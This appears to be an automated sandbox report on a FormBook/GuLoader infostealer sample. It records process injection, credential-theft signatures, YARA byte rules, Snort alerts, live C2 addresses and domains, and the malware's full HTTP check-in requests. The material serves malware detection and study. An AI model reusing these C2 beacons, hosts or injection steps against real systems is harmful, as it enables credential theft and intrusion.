Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation.exe

Overview

General Information

Sample Name:Quotation.exe
Analysis ID:830618
MD5:8a81948116d2ea79bee1d261733dba89
SHA1:5cf4113debe6d37bd770d8d3870647b8bac082a3
SHA256:5a64a3fd65f7176b7ad623893e3cb573af13eb51850f8243a1951884eee757a9
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Found potential ransomware demand text
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • Quotation.exe (PID: 4952 cmdline: C:\Users\user\Desktop\Quotation.exe MD5: 8A81948116D2EA79BEE1D261733DBA89)
    • Quotation.exe (PID: 7972 cmdline: C:\Users\user\Desktop\Quotation.exe MD5: 8A81948116D2EA79BEE1D261733DBA89)
      • explorer.exe (PID: 4712 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • control.exe (PID: 8020 cmdline: C:\Windows\SysWOW64\control.exe MD5: 4DBD69D4C9DA5AAAC731F518EF8EBEA0)
          • firefox.exe (PID: 2836 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
            • WerFault.exe (PID: 7616 cmdline: C:\Windows\system32\WerFault.exe -u -p 2836 -s 284 MD5: 5C06542FED8EE68994D43938E7326D75)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\System.dllJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x180e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x17b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x181e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x16dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x1de67:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ee1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f0b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x180e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x17b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x181e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x16dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1de67:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ee1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 11 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:192.168.11.202.57.90.1649916802031449 03/20/23-15:06:08.714083
        SID:2031449
        Source Port:49916
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20199.192.26.3549888802031412 03/20/23-15:02:43.756679
        SID:2031412
        Source Port:49888
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.202.57.90.1649916802031412 03/20/23-15:06:08.714083
        SID:2031412
        Source Port:49916
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20199.192.26.3549888802031453 03/20/23-15:02:43.756679
        SID:2031453
        Source Port:49888
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2034.117.168.23349897802031453 03/20/23-15:03:18.139935
        SID:2031453
        Source Port:49897
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2034.117.168.23349897802031412 03/20/23-15:03:18.139935
        SID:2031412
        Source Port:49897
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.202.57.90.1649916802031453 03/20/23-15:06:08.714083
        SID:2031453
        Source Port:49916
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20199.192.26.3549888802031449 03/20/23-15:02:43.756679
        SID:2031449
        Source Port:49888
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2034.117.168.23349897802031449 03/20/23-15:03:18.139935
        SID:2031449
        Source Port:49897
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: Quotation.exeVirustotal: Detection: 18%Perma Link
        Source: Quotation.exeReversingLabs: Detection: 25%
        Yara detected FormBook
        Source: Yara matchFile source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: 12.2.explorer.exe.13773814.0.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 13.2.control.exe.4dd3814.3.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 14.2.firefox.exe.129e3814.0.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: Quotation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 162.240.73.101:443 -> 192.168.11.20:49854 version: TLS 1.2
        Source: Quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.dll0.1.dr
        Source: Binary string: maintenanceservice.pdb@ 0%P% source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr
        Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr
        Source: Binary string: mshtml.pdb source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.dll0.1.dr
        Source: Binary string: control.pdb source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757544824.0000000002F80000.00000040.10000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 0000000A.00000002.22771863781.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22626322501.00000000331AA000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22633102338.0000000033352000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22731766422.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22726401565.000000000471E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004B9D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr
        Source: Binary string: wntdll.pdb source: Quotation.exe, Quotation.exe, 0000000A.00000002.22771863781.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22626322501.00000000331AA000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22633102338.0000000033352000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22731766422.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22726401565.000000000471E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004B9D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: control.pdbUGP source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757544824.0000000002F80000.00000040.10000000.00040000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: maintenanceservice.pdb source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr
        Source: Binary string: firefox.pdb source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_004062DD FindFirstFileA,FindClose,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00402765 FindFirstFileA,
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Microsoft
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData
        Source: C:\Users\user\Desktop\Quotation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache

        Networking

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 91.184.0.24 80
        Source: C:\Windows\explorer.exeNetwork Connect: 45.194.145.38 80
        Source: C:\Windows\explorer.exeNetwork Connect: 199.192.26.35 80
        Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.217 80
        Source: C:\Windows\explorer.exeNetwork Connect: 154.215.156.6 80
        Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80
        Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.196 80
        Source: C:\Windows\explorer.exeNetwork Connect: 23.83.160.9 80
        Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80
        Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.148 80
        Source: C:\Windows\explorer.exeNetwork Connect: 88.212.206.251 80
        Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80
        Source: C:\Windows\explorer.exeNetwork Connect: 172.67.212.220 80
        Source: C:\Windows\explorer.exeNetwork Connect: 198.58.118.167 80
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 199.192.26.35:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 199.192.26.35:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 199.192.26.35:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 34.117.168.233:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 34.117.168.233:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 34.117.168.233:80
        Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49916 -> 2.57.90.16:80
        Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49916 -> 2.57.90.16:80
        Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49916 -> 2.57.90.16:80
        Performs DNS queries to domains with low reputation
        Source: DNS query: www.dexmart.xyz
        Yara detected Generic Downloader
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\System.dll, type: DROPPED
        Source: Joe Sandbox ViewASN Name: HOSTNETNL HOSTNETNL
        Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&6SE=F8zFuLn HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=5uELbA0g21s84RfIYZefn7jmwGm7oIOOLOAnPy0CEmjl7E2osw+P2nrFQVa8XPAXlQFWR1Kf++ZUi1OuENtNpjpnS7NncHgQqw==&6SE=F8zFuLn HTTP/1.1Host: www.flaviosilva.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&6SE=F8zFuLn HTTP/1.1Host: www.solya-shop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=mm2yDWovojsq98EVpVvEejLaRDawKnKNjB2g4hWos3CUrPXkYcC/p+nLjVs5nQU/dkGDVZ/wRxzIeHsnSgbyBomSUgQTl++E/Q==&6SE=F8zFuLn HTTP/1.1Host: www.buymyenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=QRVitphc0g1OIlGqribmuO+/vkIwz3nmW5e0zmbI+ptVqgaVXv4o34I8PAy9Ptw3AL0LuNtl4GkWhRdrmVn9ER/XiJFNsBOU8g==&6SE=F8zFuLn HTTP/1.1Host: www.184411.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=A3xSHk+fyI7su/grjjiR7vS7+2q1W7vJyDCiqNYDPcjU2Prp7aaot61k+Logkh61BwiUEQE66B2EoDKGsTYBbPn+5VOUdQAbGQ==&6SE=F8zFuLn HTTP/1.1Host: www.b-tek.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&6SE=F8zFuLn HTTP/1.1Host: www.dexmart.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=eODNz5pw0nGnv4SFyTaum/5/t7nqNWp+9hyyxvutUEIaFJ9+iSImfL8MjMj4uhwzobeFgf5ptQiqPWHvQt8dHyNKhUrdKKLp8Q==&6SE=F8zFuLn HTTP/1.1Host: www.maxhaidt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=9I8nCmGbZhqNwxnuseOoBgVoo3mEoWGWlq2S/FO71IXVKobHlwQLLDq9ejz9WGKrhGOo7OtXutt8bUbRiDDVGcEjYwCLb2KUDQ==&6SE=F8zFuLn HTTP/1.1Host: www.ghostdyes.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=PMnnsBn+KIOLN/VfOifa/NU1HKCRW97HYgMDorQQf0wo2T3aBqzEKnmyN0lZa7FB9krY/amKEMrac7kP3KvtrQL60DCopbH9IA==&6SE=F8zFuLn HTTP/1.1Host: www.aznqmd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=Cz7EdLoZVVVFkl6Al85Fq2yKknQr9MrL8MY+iTrjKvcqeI67VNXHoBdgAYm0xOpsMAVI5pfYswEw4evz8uHbKlZcCugzfDdIKQ==&6SE=F8zFuLn HTTP/1.1Host: www.texasgent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=BFqfPYQ6Rc2mbekoZnhhN28rIM4KcYUdKeGPb5qgdPRiCoEueOOZiURhvdwkEmvoJvWE5RZiBCNwm7zhRu2A+WCDMptVnP5c5Q==&6SE=F8zFuLn HTTP/1.1Host: www.brightfms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=hOvML0SIJI9mj/fVfRhHepYZOU2m/dN5Na3UVct1YKAZzOLDbZKzqMpLuDmWZppR8Dfu1BJtX3CBTvv/fKLJ92Wtoj7W2JzMDw==&6SE=F8zFuLn HTTP/1.1Host: www.eta-trader.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=JQY8+24Njt/kPRjDacJftkXMjEMtZDsomMU4C5dHhuIEkrjQwkIyHBDAmNyMXnYjy8/Wz0vFGvMg0maSaemc6vUg0VCqTOU0ug==&6SE=F8zFuLn HTTP/1.1Host: www.funvacayflorida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn HTTP/1.1Host: www.interactive-media.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /d91r/?z4=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&6SE=F8zFuLn HTTP/1.1Host: www.cardinialethanol.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 199.192.26.35 199.192.26.35
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
        Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 20 Mar 2023 14:00:57 GMTContent-Type: text/htmlContent-Length: 62299Connection: closeETag: "627b7393-f35b"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 75 65 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 33 32 30 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e d0 92 d0 b8 d1 82 d1 80 d0 b8 d0 bd d0 b0 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b0 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 68 6f 70 77 69 6e 64 6f 77 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 bf d1 80 d0 be d0 b4 d0 b0 d0 b5 d1 82 d1 81 d1 8f 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 2f 69 6d 67 2f 6f 67 5f 69 6d 61 67 65 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 2d 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 30 20 63 6f 6c 2d 6c 67 2d 70 75 73 68 2d 31 22 3e 0a 20 20
